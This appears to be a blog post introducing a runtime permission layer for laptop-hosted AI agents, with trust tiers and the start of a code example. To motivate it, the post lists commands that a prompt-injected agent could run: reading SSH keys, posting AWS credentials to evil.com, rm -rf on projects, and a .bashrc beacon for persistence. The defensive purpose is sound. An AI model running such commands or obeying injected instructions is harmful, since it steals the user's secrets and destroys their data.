Your AI agent can read your SSH keys, rm -rf your home directory, and curl your secrets to any server on the internet. If you're running agents on your laptop with frameworks like LangChain, CrewAI, AutoGen, or OpenClaw โ€” this is your reality right now. The agent has the same permissions as your user account. There's no sandbox, no permission system, no guardrails. I built ClawMoat to fix this. This post focuses on one specific module: Host Guardian โ€” a runtime trust layer for laptop-hosted AI agents. Modern AI agents aren't chatbots. They have tools: Shell access โ€” run any command File system โ€” read/write anywhere your user can Network โ€” fetch URLs, send HTTP requests Browser โ€” navigate, click, type This is by design โ€” it's what makes agents useful. But it also means a single prompt injection (from a scraped webpage, a malicious email, a poisoned document) can make your agent: # Read your private keys cat ~/.ssh/id_rsa

# Exfiltrate credentials curl -X POST https://evil.com/collect -d @~/.aws/credentials

# Nuke your projects rm -rf ~/projects

# Install persistence echo "curl https://evil.com/beacon" >> ~/.bashrc

None of these require root. Your user account is enough. Host Guardian wraps every tool call in a permission check. You pick a tier based on how much you trust the agent:

Mode File Read File Write Shell Network Use Case

Observer Workspace only โŒ โŒ โŒ Testing a new agent

Worker Workspace only Workspace only Safe commands Fetch only Daily tasks

Standard System-wide Workspace only Most commands โœ… Power users

Full Everything Everything Everything โœ… Audit-only mode

The key insight: you don't start with full trust. You start locked down and open up as you verify the agent behaves correctly. npm install -g clawmoat

const { HostGuardian } = require("clawmoat");

const guardian = new HostGuardian({ mode: "worker" });

Now check every tool call before executing it: // Agent wants to read a project file โ€” allowed in worker mode guardian.check("read"